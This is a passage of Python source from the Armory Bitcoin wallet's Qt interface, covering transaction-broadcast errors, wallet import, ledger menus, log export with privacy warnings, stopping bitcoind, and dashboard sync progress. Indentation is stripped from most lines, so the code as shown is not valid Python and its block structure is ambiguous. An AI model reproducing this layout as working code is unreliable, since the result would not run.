'<br><br>'
'If you do not see the '
'transaction on that webpage within one minute, it failed and you '
'should attempt to re-send it. '
'If it <i>does</i> show up, then you do not need to do anything '
'else -- it will show up in Armory as soon as it receives one '
'confirmation. '
'<br><br>If the transaction did fail, it is likely because the fee '
'is too low. Try again with a higher fee. '
'If the problem persists, go to "<i>File</i>" -> '
'"<i>Export Log File</i>" and then attach it to a support '
'ticket at <a href="%5">%5</a>').arg(errorMsg, BLOCKEXPLORE_NAME, blkexplURL, \
blkexplURL_short, supportURL), QMessageBox.Ok)
else:
         if errorMsgFromRPC is None:
LOGERROR('Broadcast error: %s' % errorMsg)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has timed out. '
'<br><br>'
            'The RPC interface of your node is disabled, therefore Armory cannot '
'use it to gather more information about the timeout. It is '
'recommended that you enable the RPC and try again.'
), QMessageBox.Ok)
else:
LOGERROR('Broadcast error: %s' % errorMsgFromRPC)
QMessageBox.warning(self, self.tr('Transaction Not Accepted'), self.tr(
'The transaction that you just attempted to broadcast has failed with '
'the following error: '
'<br><br><b>%1</b>'
).arg(errorMsgFromRPC), QMessageBox.Ok)
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
self.tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
            'performing the import before switching to online mode.'))
QMessageBox.warning(self, self.tr('Armory is Busy'), \
self.tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, self.tr('Scanning'), self.tr(
'Armory is currently in the middle of scanning the blockchain for '
'your existing wallets. New wallets cannot be imported until this '
'operation is finished.'), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, self.tr('Duplicate Wallet!'), self.tr(
'You selected a wallet that has the same ID as one already '
'in your wallet (%1)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory, first.').arg(wltID), \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, self.tr('Be Careful!'), self.tr(
'<font color="red"><b>WARNING:</b></font> You are about to make an '
'<u>unencrypted</u> backup of your wallet. It is highly recommended '
'that you do <u>not</u> ever save unencrypted wallets to your regular '
'hard drive. This feature is intended for saving to a USB key or '
'other removable media.'), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, self.tr('Blockchain Not Ready'), self.tr(
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.'), QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, self.tr('No wallets!'), self.tr('You have no wallets so '
'there is no address book to display.'), QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
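         # e.g. 'foo.wallet' -> 'foo_02.wallet' -> 'foo_02_03.wallet', since
         # the current candidate name is re-split on every pass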
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
            raise WalletExistsError('Cannot find unique filename for wallet. '
                                    'Too many duplicates!')
return fname
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
pytx.setRBF(cppTx.isRBF())
      if pytx is None:
QMessageBox.critical(self, self.tr('Invalid Tx'), self.tr(
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...'), QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
amount, flag = self.ledgerView.model().index(row, LEDGERCOLS.Amount).data().toFloat()
rbf = self.ledgerView.model().index(row, LEDGERCOLS.optInRBF).data().toBool()
issts = self.ledgerView.model().index(row, LEDGERCOLS.toSelf).data().toBool()
flagged = rbf and (amount < 0 or issts)
if flagged:
actBump = menu.addAction(self.tr("Bump Fee"))
actViewTx = menu.addAction(self.tr("View Details"))
actViewBlkChn = menu.addAction(self.tr("View on %1").arg(BLOCKEXPLORE_NAME))
actComment = menu.addAction(self.tr("Change Comment"))
actCopyTxID = menu.addAction(self.tr("Copy Transaction ID"))
actOpenWallet = menu.addAction(self.tr("Open Relevant Wallet"))
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
DlgBrowserWarn(BLOCKEXPLORE_URL_TX % txHash).exec_()
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, self.tr('Could not open browser'), self.tr(
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%1').arg(BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
elif flagged and action==actBump:
txHash = hex_switchEndian(txHash)
self.bumpFee(wltID, txHash)
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
      return None if wltID is None else self.walletMap[wltID]
   #############################################################################
   def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, self.tr('Offline Mode'), self.tr(
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.'), QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, self.tr('Armory Not Ready'), self.tr(
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.'), \
QMessageBox.Ok)
return
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin Core doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
descrStr = self.tr('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += self.tr('<br>--<b>Address</b>:\t%1 ').arg(uriDict['address'])
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += self.tr('<br>--<b>Amount</b>:\t%1 BTC').arg(amtstr)
if newMsg:
if len(newMsg)>60:
descrStr += self.tr('<br>--<b>Message</b>:\t%1...').arg(newMsg[:60])
else:
descrStr += self.tr('<br>--<b>Message</b>:\t%1').arg(newMsg)
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += (self.tr('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this transaction. '))
else:
descrStr += self.tr('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
dlg = DlgSendBitcoins(self.getSelectedWallet(), self, self)
dlg.frame.prefillFromURI(uriDict)
dlg.exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'), self.tr(
'You have not created any wallets which means there is '
'nowhere to store your bitcoins! Would you like to '
'create a wallet now?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, self.tr('Receive coins with wallet...'), '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'<b><u><font size=3>Wallet Analysis Log Files</font></u></b> '
'<br><br> '
'The wallet analysis logs contain no personally-identifiable '
'information, only a record of errors and inconsistencies '
'found in your wallet file. No private keys or even public '
'keys are included. '
'<br><br>'
'<b><u><font size=3>Regular Log Files</font></u></b>'
'<br><br>'
'The regular log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. It is always '
'recommended you include your log files with any request to the '
'Armory team, unless you are uncomfortable with the privacy '
'implications. '
'<br><br>'
'<b><u><font size=3>Watching-only Wallet</font></u></b> '
'<br><br>'
'A watching-only wallet is a copy of a regular wallet that does not '
'contain any signing keys. This allows the holder to see the balance '
'and transaction history of the wallet, but not spend any of the funds. '
'<br><br> '
'You may be requested to submit a watching-only copy of your wallet '
'to make sure that there is no '
'risk to the security of your funds. You should not even consider '
'sending your '
'watching-only wallet unless it was specifically requested by an '
'Armory representative.'), yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, self.tr('Privacy Warning'), self.tr(
'Armory log files do not contain any <u>security</u>-sensitive '
'information, but some users may consider the information to be '
'<u>privacy</u>-sensitive. The log files may identify some addresses '
'and transactions that are related to your wallets. '
'<br><br> '
'<b>No signing-key data is ever written to the log file</b>. '
'Only enough data is there to help the Armory developers '
'track down bugs in the software, but it may still be considered '
'sensitive information to some users. '
'<br><br>'
'Please do not send the log file to the Armory developers if you '
'are not comfortable with the privacy implications! However, if you '
'do not send the log file, it may be very difficult or impossible '
'for us to help you with your problem.'), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMDB_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if TheSDM.satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, self.tr('Already running!'), self.tr(
'The Bitcoin software appears to be installed now, but it '
'needs to be closed for Armory to work. Would you like Armory '
'to close it for you?'), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, self.tr('Still Missing'), self.tr(
'The Bitcoin software still appears to be missing. If you '
'just installed it, then please adjust your settings to point '
'to the installation directory.'), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if TheSDM.satoshiIsAvailable():
result = QMessageBox.warning(self, self.tr('Still Running'), self.tr(
'Bitcoin Core is still running. Armory cannot start until '
'it is closed. Do you want Armory to close it for you?'), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeSync.setText( self.tr('Node Status'), \
size=4, bold=True, color='Foreground')
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(3)]
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton(self.tr('Close Bitcoin Process'))
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton(self.tr('Open https://bitcoin.org'))
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton(self.tr('Change Settings'))
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
      self.lblShuttingDown.setText(self.tr('Preparing to shut down...'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
DlgBrowserWarn('https://bitcoin.org/en/download').exec_()
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
self.tr('Stop existing Bitcoin processes so that Armory can open its own'))
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
self.tr('Open browser to Bitcoin webpage to download and install Bitcoin software'))
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
self.tr('Open Armory settings window to change Bitcoin software management'))
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( self.tr(
'Will open your default browser to https://bitcoin.org where you can '
'download the latest version of Bitcoin Core, and get other information '
'and links about Bitcoin, in general.'))
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget( self.tr(
'Change Bitcoin Core/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation'))
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( self.tr(
'Armory has detected a running Bitcoin Core or bitcoind instance and '
'will force it to exit'))
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(3):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
            # If the block above raises access denied or anything else, just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, self.tr('Not Found'), self.tr(
'Attempted to kill the running Bitcoin Core/bitcoind instance, '
'but it was not found.'), QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
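      # Weight progress by estimated cumulative blockchain size instead of
      # raw block count: early blocks are tiny, so lastblk/maxblk alone would
      # overstate progress. E.g. (hypothetical numbers) if block 400k marks
      # ~60% of the chain's bytes out of 500k blocks, this returns 0.6
      # rather than 0.8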
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
sdmStr = TheSDM.getSDMStateStr()
if TheBDM.getState()==BDM_SCANNING:
self.lblDashModeSync.setVisible(False)
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( self.tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( self.tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( self.tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( self.tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
elif phase==Cpp.BDMPhase_Balance:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Computing Balances'), \
size=4, bold=True, color='Foreground')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_SearchHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Parsing Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(0)
self.barProgressScan.setRange(0,0)
elif phase==Cpp.BDMPhase_ResolveHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Resolving Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(100)
self.barProgressScan.setRange(0,100)
self.barProgressScan.setFormat('%p%')
showPct = True
if tleft != 2**32 - 1:
tstring = secondsToHumanTime(tleft)
else:
tstring = "N/A"
showPct = False
pvalue = pct*100
if showPct:
            if phase in (Cpp.BDMPhase_BlockHeaders, Cpp.BDMPhase_BlockData, Cpp.BDMPhase_DBHeaders):
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(pvalue)
            elif phase in (Cpp.BDMPhase_Rescan, Cpp.BDMPhase_ResolveHashes):
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(pvalue)
self.lblTimeLeftScan.setVisible(True)
elif sdmStr in ['NodeStatus_Initializing','NodeStatus_Syncing']:
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
